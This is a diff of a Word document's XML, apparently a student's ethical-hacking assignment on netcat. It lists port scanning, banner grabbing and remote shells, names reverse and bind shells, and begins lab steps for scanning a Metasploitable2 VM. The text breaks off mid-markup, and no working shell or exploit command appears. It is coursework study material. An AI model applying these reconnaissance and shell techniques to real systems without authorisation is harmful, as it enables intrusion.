--- a/MissionHackerBD/Assignments/IstiaqAlam_CEH_Assignment-06.docx
+++ b/MissionHackerBD/Assignments/IstiaqAlam_CEH_Assignment-06.docx
@@ -168,7 +168,7 @@
           <w:sz w:val="56"/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">Assignment No-02  </w:t>
+        <w:t xml:space="preserve">Assignment No-06  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -212,7 +212,27 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
-        <w:t>Assignment Title: Wireshark Packet Capture</w:t>
+        <w:t xml:space="preserve">Assignment Title: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>Active</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Reconnaissance </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -336,7 +356,7 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
-        <w:t>Submission Date: 08-07-25</w:t>
+        <w:t>Submission Date: 25-07-25</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -354,7 +374,7 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
-        <w:t xml:space="preserve">Lab Task Topic: </w:t>
+        <w:t xml:space="preserve">Tools Task / Topic: File Transfer using Netcat  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -364,7 +384,7 @@
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
         </w:rPr>
-        <w:t xml:space="preserve">Capturing and Analyzing HTTP Login  </w:t>
+        <w:t xml:space="preserve">  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -382,7 +402,7 @@
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
         </w:rPr>
-        <w:t xml:space="preserve">                                </w:t>
+        <w:t xml:space="preserve">                                     </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -392,7 +412,7 @@
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
         </w:rPr>
-        <w:t>Packets.</w:t>
+        <w:t>between two device.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -509,6 +529,8 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
         </w:rPr>
@@ -516,10 +538,1555 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
         </w:rPr>
-        <w:t>Heading : ….</w:t>
+        <w:t xml:space="preserve">Active Reconnaissance : Netcat </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:ind w:hanging="10" w:left="-5"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">What we can do using netcat..? </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Port Scanning </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Banner Grabbing </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>File Transfer</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Remote Shell </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Chat / messaging Tool in terminal </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">To Start netcat open terminal and run : </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nc -help </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">for tool manual </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>SYNOPSIS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>nc [-options] hostname port[s] [ports]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>nc -l -p port [-options] [hostname] [port]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">There two kind of shell : </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>1. Reverse Shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>2. Bind Shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Start with setting up host and target and Scan the target :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Step 1 : Open any virtual machine and turn on metaslpoitable2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Step 2 : For scanning the vulnerable machine port, get the IP and start scanning from Netcat. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="3">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>295275</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>13335</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="4912360" cy="3456305"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="2" name="Image1" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2" name="Image1" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId3"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4912360" cy="3456305"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
